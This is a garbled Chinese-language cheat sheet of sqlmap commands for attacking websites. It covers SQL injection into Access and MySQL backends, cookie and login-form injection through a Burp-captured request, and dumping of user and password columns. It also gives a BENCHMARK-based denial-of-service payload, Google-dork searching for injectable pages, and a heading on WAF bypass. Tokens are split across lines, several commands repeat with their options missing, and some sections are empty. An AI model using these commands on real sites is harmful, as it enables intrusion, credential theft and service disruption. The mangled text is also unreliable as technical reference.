一、SQLMAP用于Access数据库注入
python sqlmap.py
-
u
"http://www.xxx.com/en/CompHonorBig.asp?id=7"
python sqlmap.py
-
u
"http://www.xxx.com/en/CompHonorBig.asp?id=7"
python sqlmap.py
-
u
"http://www.xxx.com/en/CompHonorBig.asp?id=7"
python sqlmap.py
-
u
"http://www.xxx.com/en/CompHonorBig.asp?id=7"
二、SQLMAP用于Cookie注入
python sqlmap.py
-
u
"http://www.xxx.org/jsj/shownews.asp"
python sqlmap.py
-
u
"http://www.xxx.org/jsj/shownews.asp"
python sqlmap.py
-
u
"http://www.xxx.org/jsj/shownews.asp"
三、SQLMAP用于mysql中DDOS攻击
python sqlmap.py
-
u [
url
]http
:
/
/
192.1
68.1
59.1
/
news.php?
id
=
1
[
/
url
]
select
benchmark
(
99999999999
,
0
x
70726
f
62616
e
646
f
70726
f
62616
e
646
f
70726
f
62616
e
646
f
)
四、SQLMAP用于mysql注入
python sqlmap.py
-
u
"http://www.xxx.com/link.php?id=321"
python sqlmap.py
-
u
"http://www.xxx.com/link.php?id=321"
-
D dataname
python sqlmap.py
-
u
"http://www.xxx.com/link.php?id=321"
-
D dataname
-
T table_name
python sqlmap.py
-
u
"http://www.xxx.com/link.php?id=321"
-
D dataname
-
T table_name
-
C
"id,user,password"
五、SQLMAP中post登陆框注入
1. 浏览器打开目标地址http:// www.xxx.com /Login.asp
2. 配置burp代理(127.0.0.1:8080)以拦截请求
3. 点击login表单的submit按钮
4. 这时候Burp会拦截到了我们的登录POST请求
5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下
6. 运行sqlmap并使用如下命令:
.
/
sqlmap.py
-
r search
-
test.txt
-
p tfUPass
自动搜索注入:
sqlmap
-
u [
url
]http
:
/
/
testasp.vulnweb.com
/
Login.asp[
/
url
]
指定参数注入:
sqlmap
-
u [
url
]http
:
/
/
testasp.vulnweb.com
/
Login.asp[
/
url
]
六、SQLMAP中Google搜索注入
sqlmap
-
g inurl
:
php?
id
=
七、SQLMAP中的请求延迟
参数 --delay --safe-freq
python sqlmap.py
python sqlmap.py
八、SQLMAP绕过WAF防火墙
sqlmap
-
u [
url
]http
:
/
/
192.1
68.1
59.1
/
news.php?
id
=
1
[
/
url
]
-
v
3